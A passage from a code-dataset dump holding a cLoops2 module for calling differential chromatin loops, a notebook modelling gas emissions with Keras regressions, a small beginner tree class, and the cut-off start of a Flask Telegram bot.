*\nfrom cLoops2.callCisLoops import getLoopNearbyPETs\n\n\ndef mergeLoops(aloops, samplea, bloops, sampleb):\n \"\"\"\n Get the union set of loops for candidate test samples. \n \"\"\"\n mloops = {}\n allkeys = set(aloops.keys())\n allkeys.update(bloops.keys())\n for key in allkeys:\n mloops[key] = []\n\n for key in mloops.keys():\n if key not in aloops:\n for loop in bloops[key]:\n loop.id = loop.id + \"|\" + sampleb\n mloops[key].append(loop)\n elif key not in bloops:\n for loop in aloops[key]:\n loop.id = loop.id + \"|\" + samplea\n mloops[key].append(loop)\n else:\n nloops = []\n #scan a first\n for aloop in aloops[key]:\n flag = True # no overlapped loops, keep it\n p = -1\n for j, bloop in enumerate(bloops[key]):\n if checkLoopOverlap(aloop, bloop):\n flag = False\n p = j\n break\n #no overlapped loops find, just add it\n if flag == True:\n aloop.id = aloop.id + \"|\" + samplea\n nloops.append(aloop)\n else: #merge overlapped loops, skip the bloop\n bloop = deepcopy(bloops[key][p])\n del bloops[key][p]\n nloop = Loop()\n nloop.id = \"|\".join([aloop.id, samplea, bloop.id, sampleb])\n nloop.chromX = aloop.chromX\n nloop.chromY = aloop.chromY\n nloop.x_start = min(aloop.x_start, bloop.x_start)\n nloop.x_end = max(aloop.x_end, bloop.x_end)\n nloop.x_center = (nloop.x_start + nloop.x_end) / 2\n nloop.y_start = min(aloop.y_start, bloop.y_start)\n nloop.y_end = max(aloop.y_end, bloop.y_end)\n nloop.y_center = (nloop.y_start + nloop.y_end) / 2\n if set(key.split(\"-\")) == 1:\n nloop.distance = nloop.y_center - nloop.x_center\n nloops.append(nloop)\n #scan b to add to merged\n for bloop in bloops[key]:\n bloop.id = bloop.id + \"|\" + sampleb\n nloops.append(bloop)\n mloops[key] = nloops\n return mloops\n\n\ndef quantDloops(key, loops, fixya, fixyb, cut=0, mcut=-1, win=1, pseudo=1.0):\n \"\"\"\n Estimate the differential of significant loops.\n \"\"\"\n if len(loops) == 0:\n return None\n\n #query structure\n axy = ixy2pet(fixya, cut=cut, mcut=mcut)\n bxy = ixy2pet(fixyb, cut=cut, mcut=mcut)\n\n #all information of nearby counts\n ts = []\n cs = []\n\n print(\"Quantify %s loops for %s.\" % (len(loops), key))\n #for loop in tqdm(loops):\n dloops = []\n for loop in tqdm(loops):\n ara, arb, arab = axy.queryLoop(loop.x_start, loop.x_end, loop.y_start,\n loop.y_end)\n bra, brb, brab = bxy.queryLoop(loop.x_start, loop.x_end, loop.y_start,\n loop.y_end)\n arabs, anbps = getLoopNearbyPETs(loop, axy, win)\n brabs, bnbps = getLoopNearbyPETs(loop, bxy, win)\n #get all the information\n dloop = DiffLoop()\n dloop.id = loop.id\n dloop.chromX = loop.chromX\n dloop.chromY = loop.chromY\n dloop.x_start = loop.x_start\n dloop.x_end = loop.x_end\n dloop.x_center = loop.x_center\n dloop.y_start = loop.y_start\n dloop.y_end = loop.y_end\n dloop.y_center = loop.y_center\n dloop.distance = loop.y_center - loop.x_center\n dloop.raw_trt_ra = len(ara)\n dloop.raw_trt_rb = len(arb)\n dloop.raw_con_ra = len(bra)\n dloop.raw_con_rb = len(brb)\n dloop.raw_trt_rab = len(arab)\n dloop.raw_con_rab = len(brab)\n dloop.size = dloop.x_end - dloop.x_start + dloop.y_end - dloop.y_start\n dloop.raw_trt_mrab = np.mean(arabs)\n dloop.raw_con_mrab = np.mean(brabs)\n ts.extend(arabs)\n cs.extend(brabs)\n dloop.trt_es = dloop.raw_trt_rab / max(dloop.raw_trt_mrab, pseudo)\n dloop.con_es = dloop.raw_con_rab / max(dloop.raw_con_mrab, pseudo)\n dloops.append(dloop)\n return key, ts, cs, dloops\n\n\ndef plotBgMANorm(sf, cs, ts, m, a, m2, a2, fout, mcut, acut, fdr):\n \"\"\"\n Plot the MANorm2 result before and after for background data, and estimate cutoffs\n @param sf: [], list of sacling factors, \n @param cs: [], list of control background data,log2 transformed\n @param ts: [], list of target background data,log2 transformed\n @param m: [], np.log2(cs)-np.log2(ts)\n @param a: [], (np.log2(cs)+np.log2(ts))/2\n \"\"\"\n fig, axs = pylab.subplots(1,\n 3,\n figsize=(8.5, 2.2),\n sharex=False,\n sharey=False)\n axs = axs.reshape(-1)\n #plot 1 raw data\n axs[0].scatter(ts, cs, s=1, c=\"gray\")\n axs[0].set_xlabel(\"target log2(PETs)\")\n axs[0].set_ylabel(\"control log2(PETs)\")\n axs[0].set_title(\"raw bg data\")\n #plot the fit\n #show the formula\n if sf[1] > 0:\n formula = \"y=%.3fx+%.3f\" % (sf[0], sf[1])\n else:\n formula = \"y=%.3fx%.3f\" % (sf[0], sf[1])\n axs[0].plot(ts, ts * sf[0] + sf[1], label=formula)\n axs[0].legend()\n #plot 2, raw data MA\n axs[1].scatter(a, m, s=1, c=\"gray\")\n axs[1].set_title(\"before normalization\\nmean(M):%.3f;M~A PCC:%.3f\" %\n (np.mean(m), np.corrcoef(m, a)[0][1]),\n fontsize=8)\n axs[1].set_xlabel(\"A\")\n axs[1].set_ylabel(\"M\")\n #plot 3 transformed data\n axs[2].scatter(a2, m2, s=1, c=\"gray\")\n axs[2].set_title(\"after normalization\\nmean(M):%.3f;M~A PCC :%.3f\" %\n (np.mean(m2), np.corrcoef(m2, a2)[0][1]),\n fontsize=8)\n\n axs[2].set_xlabel(\"A\")\n axs[2].set_ylabel(\"M\")\n upm = np.where(m2 >= mcut)[0]\n upa = np.where(a2 >= acut)[0]\n up = list(set(upm).intersection(upa))\n downm = np.where(m2 <= -mcut)[0]\n downa = np.where(a2 >= acut)[0]\n down = list(set(downm).intersection(downa))\n #up dots\n axs[2].scatter(a2[up],\n m2[up],\n color=colors[2],\n s=1,\n label=\"up %.3f%s\" % (float(len(up)) / len(m2) * 100, \"%\"))\n #down dots\n axs[2].scatter(a2[down],\n m2[down],\n color=colors[3],\n s=1,\n label=\"down %.3f%s\" %\n (float(len(down)) / len(m2) * 100, \"%\"))\n axs[2].legend()\n pylab.suptitle(\"bg FDR<=%.3f mcut=%.3f acut=%.3f\" % (fdr, mcut, acut),\n fontsize=8)\n pylab.subplots_adjust(top=0.7, wspace=0.3, hspace=0.5)\n pylab.savefig(\"%s_background_MANormFit.pdf\" % fout)\n\n\ndef getBgNorm(cs,\n ts,\n fout,\n mcut=0,\n acut=0,\n step=0.1,\n fdrcut=0.05,\n pseudocut=1.0\n ):\n \"\"\" \n Do the MANorm with background data and estimate the cutoffs.\n @param cs: [], list of background counts of control data\n @param ts: [], list of background counts of target data\n @param cfgs: [], list of foreground counts of control data\n @param tfgs: [], list of foreground counts of target data\n @param fout: output prefix for plot\n @param mcut: float,M cutoff for MA plot\n @param acut: float,A cutoff for MA plot\n @param step: float, step for increasing mcut and acut while searching\n @param fdrcut: float, main cutoff\n @param pseudocut: float, used to avoid 0 \n \"\"\"\n #remove zeros for log transformation\n cs = np.array(cs)\n ts = np.array(ts)\n cs = np.log2(cs + pseudocut)\n ts = np.log2(ts + pseudocut)\n\n #linear shiftting\n sf = estSfMANorm(cs, ts)\n m = cs - ts\n a = (ts + cs) / 2\n #transform the data\n ts2 = [sf[0] * t + sf[1] for t in ts]\n\n m2 = cs - ts2\n a2 = (cs + ts2) / 2\n m2abs = np.abs(m2)\n #get the acut\n fdr = 1\n i = 0\n while fdr > fdrcut:\n if i % 2 == 0:\n acut = acut + step\n else:\n mcut = mcut + step\n i += 1\n de = np.where(m2abs >= mcut)[0]\n de = len(np.where(a2[de] >= acut)[0])\n fdr = float(de) / len(m2abs)\n #plot the estimated result\n plotBgMANorm(sf, cs, ts, m, a, m2, a2, fout, mcut, acut, fdr)\n return sf, acut, mcut\n\n\ndef estLoopDiffSig(key, sf, ta, tb, dloops, pseudo=1.0):\n \"\"\"\n Estimation of differential significance.\n @param key: str,chrom-chrom\n @param sf: [float,float],scaling factor,\n @param ta: float or int, total PETs for sample A\n @param tb: float or int, total PETs for sample B\n @param dloops: list of cLoops2.ds.DiffLoop object\n @param pseudo: float/int, pseudo counts, used to avoid /0 or log(0)\n \"\"\"\n #cs for control ipk, ts for target ipk, ts2 for scaled\n cs, ts, ts2 = [], [], []\n print(\"Estimate difference significance %s loops for %s.\" %\n (len(dloops), key))\n for loop in tqdm(dloops):\n loop.trt_density = max(loop.raw_trt_rab,\n pseudo) / loop.size / ta * 10**9\n loop.con_density = max(loop.raw_con_rab,\n pseudo) / loop.size / tb * 10**9\n #the MA fitting is based on log2 transformation\n loop.scaled_trt_rab = 2**(sf[0] * np.log2(loop.raw_trt_rab) + sf[1])\n loop.scaled_trt_mrab = 2**(sf[0] * np.log2(loop.raw_trt_mrab) + sf[1])\n loop.scaled_trt_ra = 2**(sf[0] * np.log2(loop.raw_trt_ra) + sf[1])\n loop.scaled_trt_rb = 2**(sf[0] * np.log2(loop.raw_trt_rb) + sf[1])\n #target sample has potential to be significant\n if loop.scaled_trt_rab > loop.raw_con_rab:\n fg = loop.scaled_trt_rab\n bg = max(loop.raw_con_rab, loop.raw_con_mrab)\n #control sample has potential to be significant\n else:\n fg = loop.raw_con_rab\n bg = max(loop.scaled_trt_rab, loop.scaled_trt_mrab)\n cs.append(max(loop.raw_con_rab, pseudo))\n ts.append(max(loop.raw_trt_rab, pseudo))\n ts2.append(max(loop.scaled_trt_rab, pseudo))\n pop = poisson.sf(fg - 1, bg)\n pop = max([pop, 1e-300])\n loop.poisson_p_value = pop\n #loop.raw_fc = np.log2(max(loop.raw_trt_rab, pseudo) / ta) - np.log2( max(loop.raw_con_rab, pseudo) / tb)\n #loop.scaled_fc = np.log2(max(loop.scaled_trt_rab, pseudo)) - np.log2( max(loop.raw_con_rab, pseudo) )\n loop.raw_fc = np.log2(loop.raw_trt_rab / ta) - np.log2(\n loop.raw_con_rab / tb)\n loop.scaled_fc = np.log2(loop.scaled_trt_rab) - np.log2(\n loop.raw_con_rab)\n return dloops, cs, ts, ts2\n\n\ndef markDiffSig(loops, acut, mcut, pcut=1e-2, pseudo=1,igp=False,noPCorr=False):\n \"\"\"\n Carry out Bonferroni correction for p-values first then mark the significance of loops\n \"\"\"\n for loop in loops:\n if noPCorr == False:\n loop.poisson_p_value = min(1, loop.poisson_p_value * len(loops))\n if igp == False:\n if loop.poisson_p_value <= pcut and abs(loop.scaled_fc) >= mcut:\n c = np.log2(max(loop.raw_con_rab, pseudo))\n t = np.log2(max(loop.scaled_trt_rab, pseudo))\n #loop.significant = 1\n a = (c + t) / 2\n if a >= acut:\n loop.significant = 1\n else:\n loop.significant = 0\n else:\n loop.significant = 0\n else:\n if abs(loop.scaled_fc) >= mcut:\n c = np.log2(max(loop.raw_con_rab, pseudo))\n t = np.log2(max(loop.scaled_trt_rab, pseudo))\n #loop.significant = 1\n a = (c + t) / 2\n if a >= acut:\n loop.significant = 1\n else:\n loop.significant = 0\n else:\n loop.significant = 0\n return loops\n\n\ndef plotDiffLoopsMA(sigIndex, cs, ts, ts2, tname, cname, mcut, acut, fout):\n \"\"\"\n Plot the MA plot for differential enriched loops.\n \"\"\"\n cs = np.log2(cs)\n ts = np.log2(ts)\n ts2 = np.log2(ts2)\n m = ts - cs\n a = (ts + cs) / 2\n m2 = ts2 - cs\n a2 = (ts2 + cs) / 2\n #start plot\n fig, axs = pylab.subplots(1, 2, figsize=(6.4, 2.75 * 0.8))\n #raw data\n axs[0].scatter(a, m, s=1, c=\"gray\")\n axs[0].set_title(\"before normalization\\nmean(M):%.3f;M~A PCC:%.3f\" %\n (np.mean(m), np.corrcoef(m, a)[0][1]),\n fontsize=8)\n axs[0].set_xlabel(\"A, 1/2( log2(%s)+log2(%s) )\" % (tname, cname),\n fontsize=6)\n axs[0].set_ylabel(\"M, log2(%s) - log2(%s)\" % (tname, cname), fontsize=6)\n #scaled data\n axs[1].scatter(a2, m2, s=1, c=\"gray\")\n axs[1].set_title(\"after normalization\\nmean(M):%.3f;M~A PCC :%.3f\" %\n (np.mean(m2), np.corrcoef(m2, a2)[0][1]),\n fontsize=8)\n #diffrentially enriched loops\n up = np.where(m2 >= mcut)[0]\n up = list(set(up).intersection(set(sigIndex)))\n up = list(set(np.where(a2 >= acut)[0]).intersection(up))\n axs[1].scatter(a2[up], m2[up], color=colors[2], s=1, alpha=1)\n down = np.where(m2 <= -mcut)[0]\n down = list(set(down).intersection(set(sigIndex)))\n down = list(set(np.where(a2 >= acut)[0]).intersection(down))\n #cutoff lines\n axs[1].scatter(a2[down], m2[down], color=colors[3], s=2, alpha=1)\n axs[1].axhline(y=0,\n linewidth=1,\n linestyle=\"--\",\n color=colors[0],\n alpha=0.5)\n axs[1].axhline(y=mcut, linewidth=1, linestyle=\"--\", color=colors[1])\n axs[1].axhline(y=-mcut, linewidth=1, linestyle=\"--\", color=colors[1])\n axs[1].axvline(x=acut,\n linewidth=1,\n linestyle=\"--\",\n color=colors[4],\n alpha=0.5)\n mm = np.max(m2) * 0.8\n ma = np.max(a2) * 0.7\n axs[1].text(ma, mm, \"%s loops\" % len(up), color=colors[2])\n axs[1].text(ma, -mm, \"%s loops\" % len(down), color=colors[3])\n axs[1].set_xlabel(\"A, 1/2( log2(%s)+log2(%s) )\" % (tname, cname),\n fontsize=6)\n axs[1].set_ylabel(\"M, log2(%s) - log2(%s)\" % (tname, cname), fontsize=6)\n fig.tight_layout()\n pylab.savefig(\"%s_diffLoopsMA.pdf\" % (fout))\n\n\ndef plotDiffLoopsVolcano(f, output, tname, cname, fccut=1, pcut=1e-2):\n \"\"\"\n Plot the MA plot for differential enriched loops.\n \"\"\"\n mat = pd.read_csv(f, index_col=0, sep=\"\\t\")\n fig, ax = pylab.subplots()\n fc = mat[\"scaledFc\"]\n ps = mat[\"poissonPvalue\"]\n ps = -np.log10(ps)\n s = mat[\"significant\"]\n s = s[s > 0].index\n #all dots\n ax.scatter(fc, ps, color=\"gray\", s=1, alpha=0.5)\n up = fc[fc > 0].index.intersection(s)\n down = fc[fc < 0].index.intersection(s)\n #up dots\n ax.scatter(fc[up], ps[up], color=colors[2], s=1)\n #down dots\n ax.scatter(fc[down], ps[down], color=colors[3], s=1)\n ax.axhline(y=-np.log10(pcut), linewidth=1, linestyle=\"--\", color=colors[0])\n\n ax.text(3, 90, \"%s loops\" % len(up), color=colors[2])\n ax.text(-3, 90, \"%s loops\" % len(down), color=colors[3])\n\n ax.set_xlabel(\"log2( %s/%s )\" % (tname, cname))\n ax.set_ylabel(\"-log10(p-value)\")\n ax.set_ylim([-1, 100])\n pylab.savefig(\"%s_diffLoopsVolcano.pdf\" % (output))\n\n\ndef getDiffAggLoops(predir, loops, cpu=1, norm=True):\n \"\"\"\n Get the mean matrix and enrichment score.\n \"\"\"\n metaf = predir + \"/petMeta.json\"\n meta = json.loads(open(metaf).read())\n keys = list(meta[\"data\"][\"cis\"].keys())\n keys = list(set(keys).intersection(set(loops.keys())))\n ds = Parallel(n_jobs=cpu, backend=\"multiprocessing\")(delayed(getALoops)(\n key,\n meta[\"data\"][\"cis\"][key][\"ixy\"],\n loops[key],\n ) for key in keys)\n mat = np.concatenate([d[0] for d in ds if d[0] is not None], axis=0)\n es = []\n for i in range(mat.shape[0]):\n p = int(mat[i].shape[0] / 2)\n if mat[i].mean() > 0:\n nmat = deepcopy(mat[i])\n nmat[p, p] = 0\n if nmat.mean() == 0.0:\n continue\n else:\n es.append(mat[i, p, p] / nmat.mean())\n else:\n es.append(0.0)\n if norm:\n if mat[i].sum() == 0.0:\n continue\n else:\n mat[i] = mat[i] / mat[i].sum()\n mat[i] = (mat[i] - mat[i].mean()) / mat[i].std()\n mat = np.mean(mat, axis=0)\n return mat, es\n\n\ndef plotDiffAggLoops(dloops, output, tl, cl, td, cd, cpu=1, norm=True,vmin=None,vmax=None,cmap=\"summer\"):\n \"\"\"\n Plot the aggregated unqiue and overlapped loops.\n \"\"\"\n #process meta information\n na = td.split(\"/\")[-1] #name of sample directory\n nb = cd.split(\"/\")[-1]\n\n #seperated loops as overlapped, trt specific, con specific\n overlappedLoops = {}\n trtLoops = {}\n conLoops = {}\n #counts of called un-specific and specific loops\n cover, ctrt, ccon = 0, 0, 0\n for loop in dloops:\n key = loop.chromX + \"-\" + loop.chromY\n if loop.significant < 1:\n if key not in overlappedLoops:\n overlappedLoops[key] = []\n overlappedLoops[key].append(loop)\n cover += 1\n else:\n if loop.scaled_fc > 0:\n if key not in trtLoops:\n trtLoops[key] = []\n trtLoops[key].append(loop)\n ctrt += 1\n else:\n if key not in conLoops:\n conLoops[key] = []\n ccon += 1\n conLoops[key].append(loop)\n \n #cmap for heatmaps\n if cmap is None:\n cmap = cmaps[\"summer\"]\n else:\n cmap = cmaps[cmap]\n\n #show enrichment score and aggregation plot\n fig, axs = pylab.subplots(2, 3, figsize=(10, 6))\n \n ax = axs[0][0]\n if cover > 0:\n trtOverMat, trtOverES = getDiffAggLoops(td, overlappedLoops, cpu)\n sns.heatmap(trtOverMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_ylabel(na, fontsize=10)\n ax.set_title(\"%s un-specific loops\\nES:%.3f\" %\n (cover, np.mean(trtOverES)),\n fontsize=8)\n else:\n ax.set_title(\"No common loops\")\n\n ax = axs[0][1]\n if ctrt > 0:\n trtTrtMat, trtTrtES = getDiffAggLoops(td, trtLoops, cpu)\n sns.heatmap(trtTrtMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"%s specific loops\\nES:%.3f\" %\n (ctrt, np.mean(trtTrtES)),\n fontsize=8)\n else:\n ax.set_title(\"No %s unique loops\" % na)\n\n ax = axs[0][2]\n if ccon > 0:\n trtConMat, trtConES = getDiffAggLoops(td, conLoops, cpu)\n sns.heatmap(trtConMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"%s specific loops\\nES:%.3f\" %\n (ccon, np.mean(trtConES)),\n fontsize=8)\n else:\n ax.set_title(\"No %s unique loops\" % nb)\n\n ax = axs[1][0]\n if cover > 0:\n conOverMat, conOverES = getDiffAggLoops(cd, overlappedLoops, cpu)\n sns.heatmap(conOverMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_ylabel(nb, fontsize=10)\n ax.set_title(\"ES:%.3f\" %np.mean(conOverES), fontsize=8)\n\n ax = axs[1][1]\n if ctrt > 0:\n conTrtMat, conTrtES = getDiffAggLoops(cd, trtLoops, cpu)\n sns.heatmap(conTrtMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"ES:%.3f\" %np.mean(conTrtES),fontsize=8)\n\n ax = axs[1][2]\n if ccon > 0:\n conConMat, conConES = getDiffAggLoops(cd, conLoops, cpu)\n sns.heatmap(conConMat,\n xticklabels=False,\n yticklabels=False,\n square=True,\n ax=ax,\n cmap=cmap,\n linewidths=0.05,\n linecolor=\"gray\",\n linestyle=\"--\",\n vmin=vmin,\n vmax=vmax,\n cbar_kws={\"shrink\": 0.5})\n ax.set_title(\"ES:%.3f\" % np.mean(conConES), fontsize=8)\n\n pylab.tight_layout()\n pylab.savefig(output + \"_diffAggLoops.pdf\")\n\n\ndef callDiffLoops(\n tl,\n cl,\n td,\n cd,\n output,\n cut=0,\n mcut=-1,\n cpu=1,\n pcut=1e-2,\n igp=False,\n noPCorr=False,\n fdrcut=0.05,\n juicebox=False,\n washU=False,\n customize=False,\n cacut=0.0,\n cmcut=0.0,\n vmin=None,\n vmax=None,\n cmap=None,\n):\n \"\"\"\n Call differentially enriched loops \n @param tl: str, file of _loops.txt for treatment sample\n @param cl: str, file of _loops.txt for control sample\n @param td: str, directory generated by cLoops2 pre for treatment sample\n @param cd: str, directory generated by cLoops2 pre for control sample \n @param output: str, prefix for output file \n @param cut: int, distance cutoff for estimation of difference significance , >=cut\n @param mcut: int, distance cutoff for estimation of difference significance, <=mcut\n @param cpu: int, number of cpus used \n @param pcut: float, p-value cutoffs after Bon correction\n @param igp: bool, whether to ignore p-value cutoff\n @param noPCorr: bool, whehter to perform Bon correction of p-values, default yes\n @param fdrcut: float, fdrcut for background to estimate Mcut and Acut\n @param customize: binary, if true, use user provided MA M cut and A cut\n @param cacut: float, if customize, used, A for MA plot\n @param cmcut: float, if customize, used, M for MA plot\n @param cmap: str, color map string option\n \"\"\"\n #data name\n if td.endswith(\"/\"):\n td = td[:-1]\n if cd.endswith(\"/\"):\n cd = cd[:-1]\n tname = td.split(\"/\")[-1]\n cname = cd.split(\"/\")[-1]\n\n #read in loops\n tloops = parseTxt2Loops(tl)\n cloops = parseTxt2Loops(cl)\n\n #process meta information\n na = td.split(\"/\")[-1] #name of sample directory\n tmetaf = td + \"/petMeta.json\"\n tmeta = json.loads(open(tmetaf).read())\n nb = cd.split(\"/\")[-1]\n cmetaf = cd + \"/petMeta.json\"\n cmeta = json.loads(open(cmetaf).read())\n\n #total PETs\n ta = tmeta[\"Unique PETs\"]\n tb = cmeta[\"Unique PETs\"]\n\n #chromosomes for testing\n keys = set(tmeta[\"data\"][\"cis\"].keys()).intersection(\n set(cmeta[\"data\"][\"cis\"].keys()))\n\n # step 1, merge the overlapped loops\n mloops = mergeLoops(tloops, na, cloops, nb)\n keys = list(keys.intersection(mloops.keys()))\n\n # step 2, quantify the loops in two conditions\n ds = Parallel(n_jobs=cpu, backend=\"multiprocessing\")(delayed(quantDloops)(\n key,\n mloops[key],\n tmeta[\"data\"][\"cis\"][key][\"ixy\"],\n cmeta[\"data\"][\"cis\"][key][\"ixy\"],\n cut=cut,\n mcut=mcut,\n ) for key in keys)\n ts, cs = [], []\n dloops = {}\n for d in ds:\n if d is None:\n continue\n ts.extend(d[1])\n cs.extend(d[2])\n dloops[d[0]] = d[3]\n\n # step 3, estimate the fitting parameters, cutoffs based on MANorm\n sf, acut, mcut = getBgNorm(cs, ts, output, fdrcut=fdrcut)\n # check whether to use customized cutoffs\n if customize:\n acut = cacut \n mcut = cmcut\n\n # step 4, estimate the difference significance\n ds = Parallel(n_jobs=cpu,\n backend=\"multiprocessing\")(delayed(estLoopDiffSig)(\n key,\n sf,\n ta,\n tb,\n dloops[key],\n ) for key in keys)\n dloops = []\n cs, ts, ts2 = [], [], []\n for d in ds:\n if d is None:\n continue\n dloops.extend(d[0])\n cs.extend(d[1])\n ts.extend(d[2])\n ts2.extend(d[3])\n\n #step 5, p-values Bonferroni correction and determine whether significant\n dloops = markDiffSig(dloops, acut, mcut, pcut=pcut,igp=igp,noPCorr=noPCorr)\n sigIndex = [i for i, loop in enumerate(dloops) if loop.significant > 0]\n\n # step 6, write the result\n dloops2txt(dloops, output + \"_dloops.txt\")\n\n # step 7, write the result as washU or juicebox\n tloops = [\n dloop for dloop in dloops\n if dloop.significant > 0 and dloop.scaled_fc > 0\n ]\n cloops = [\n dloop for dloop in dloops\n if dloop.significant > 0 and dloop.scaled_fc < 0\n ]\n dloops2txt( tloops, output + \"_\" + tname +\"_specific_dloops.txt\")\n dloops2txt( cloops, output + \"_\" + cname +\"_specific_dloops.txt\")\n comloops = [dloop for dloop in dloops if dloop.significant <1]\n if juicebox:\n dloops2juiceTxt(tloops, output + \"_\" + tname + \"_loops_juicebox.txt\")\n dloops2juiceTxt(cloops, output + \"_\" + cname + \"_loops_juicebox.txt\")\n dloops2juiceTxt(comloops, output + \"_common_loops_juicebox.txt\",significant=0)\n if washU:\n loops2washuTxt(tloops, output + \"_\" + tname + \"_loops_legacyWashU.txt\")\n loops2washuTxt(cloops, output + \"_\" + cname + \"_loops_legacyWashU.txt\")\n loops2washuTxt(comloops, output + \"_common_loops_legacyWashU.txt\",significant=0)\n dloops2NewWashuTxt(tloops,\n output + \"_\" + tname + \"_loops_newWashU.txt\")\n dloops2NewWashuTxt(cloops,\n output + \"_\" + cname + \"_loops_newWashU.txt\")\n dloops2NewWashuTxt(comloops, output + \"_common_loops_newWashU.txt\",significant=0)\n\n # step 8, show plot\n #ma plot\n plotDiffLoopsMA(sigIndex, cs, ts, ts2, tname, cname, mcut, acut, output)\n #volcano plot\n plotDiffLoopsVolcano(output + \"_dloops.txt\",\n output,\n tname,\n cname,\n fccut=mcut,\n pcut=pcut)\n #plot aggregated differential loops\n plotDiffAggLoops(dloops, output, tl, cl, td, cd, cpu=cpu, norm=True,vmin=vmin,vmax=vmax,cmap=cmap)\n\n","sub_path":"build/lib/cLoops2/callDiffLoops.py","file_name":"callDiffLoops.py","file_ext":"py","file_size_in_byte":29700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"439288931","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd \nimport numpy as np \nimport numpy.linalg as lalg\nimport matplotlib.pyplot as plt \nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport tensorflow.keras.regularizers as rg\nfrom sklearn.model_selection import KFold\nfrom Models import *\n\n\n# In[2]:\n\n\nemissions = pd.read_csv(\"../data/emissions.csv\")\nemissions.fillna(emissions.mean())\nx = emissions[emissions.columns[1:11]].to_numpy()\nox = np.insert(x, 10, 1.0, axis = 1)\ny = emissions[emissions.columns[0]].to_numpy()\n\n\n# In[ ]:\n\n\nauto_perceptron = Perceptron(ox, y, 0.1, build_fn = Perceptron.build_model)\nforward_pcp = auto_perceptron.forward_selection(5000)\nbackward_pcp = auto_perceptron.backward_elimination(5000)\nstep_pcp = auto_perceptron.stepwise_regression(5000)\n\n\n# In[ ]:\n\n\nauto_3L = NeuralNet3L(ox, y, build_fn = NeuralNet3L.build_model)\nforward_3L = auto_3L.forward_selection()\nbackward_3L = auto_3L.backward_elimination()\nstep_3L = auto_3L.stepwise_regression()\n\n\n# In[ ]:\n\n\nauto_4L = NeuralNet4L(ox, y, build_fn = NeuralNet4L.build_model)\nforward_4L = auto_4L.forward_selection()\nbackward_4L = auto_4L.backward_elimination()\nstep_4L = auto_4L.stepwise_regression()\n\n\n# In[ ]:\n\n\nridge_perceptron = keras.Sequential()\nridge_perceptron.add(layers.Dense(1, input_dim = 11, \n kernel_initializer = \"uniform\", \n activation = \"relu\", \n use_bias = False,\n kernel_regularizer = rg.l2(0.01)))\n\noptimizer = keras.optimizers.Adam(learning_rate = 0.0005)\nridge_perceptron.compile(loss = \"mean_squared_error\", optimizer = optimizer)\n\n\n# In[ ]:\n\n\nridge_perceptron.fit(ox, y, epochs = 50, batch_size = 10, verbose = 0)\nrsq = metrics.rsq(ridge_perceptron, ox, y)\nrsq_cv = metrics.rsq_cv(ridge_perceptron, ox, y, epochs = 50)\nprint(f\"Rsq = {rsq} Rsq_cv = {rsq_cv}\")\n\n\n# In[ ]:\n\n\ndef plot_and_save(arrays, name, basepath = \"../plots/python/\"): \n rsq, rsq_a, rsq_cv, aic = arrays\n x = [_ for _ in range(len(rsq))]\n plt.style.use(\"fivethirtyeight\")\n plt.rcParams[\"figure.figsize\"] = [10,10]\n plt.plot(x, np.array([rsq, rsq_a, rsq_cv]).transpose())\n plt.xlabel(\"Number of variables\")\n plt.ylabel(\"Rsq Value\")\n plt.legend([\"Rsq\", \"RsqAdj\", \"RsqCV\"])\n plt.savefig(basepath+name)\n plt.show()\n \n plt.style.use(\"fivethirtyeight\")\n plt.plot(x, aic)\n plt.xlabel(\"Number of Variables\")\n plt.ylabel(\"AIC\")\n plt.savefig(basepath+\"AIC\"+name)\n plt.show()\n \nplot_and_save(forward_pcp, \"AutoForwardPCP.png\")\nplot_and_save(backward_pcp, \"BackWardPCP.png\")\nplot_and_save(step_pcp, \"StepwisePCP.png\")\n\nplot_and_save(forward_3L, \"AutoForward3L.png\")\nplot_and_save(backward_3L, \"BackWard3L.png\")\nplot_and_save(step_3L, \"Stepwise3L.png\")\n\nplot_and_save(forward_4L, \"AutoForward4L.png\")\nplot_and_save(backward_4L, \"BackWard4L.png\")\nplot_and_save(step_4L, \"Stepwise4L.png\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"python/GasEmissions.py","file_name":"GasEmissions.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"102962270","text":"class star( int ):\n\tdef __init__(self, fff=0):\n\t\tself.left = 0\n\t\tself.rigth = 0\n\t\tself.level = 0\n\tdef addch(self, dobav1):\n\t\t\tif self.left == 0: a.left = dobav1\n\t\t\telse: a.rigth = dobav1\n\t#def delch(self, kill):\t\n\t\t#self.caption(a, b)\n\t\t#a.self( delety(a,b))\na=star(3)\n#print(a)\t\t\t\na.addch(4)\na.addch(5)\nprint(a.left)\nprint(a.rigth)\n#a.delch(4, 1)\n\n#print(a.rigth)\n","sub_path":"Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"505932811","text":"import sys\nfrom io import BytesIO\n\nimport telegram\nfrom flask import Flask, request, send_file\n\nfrom fsm 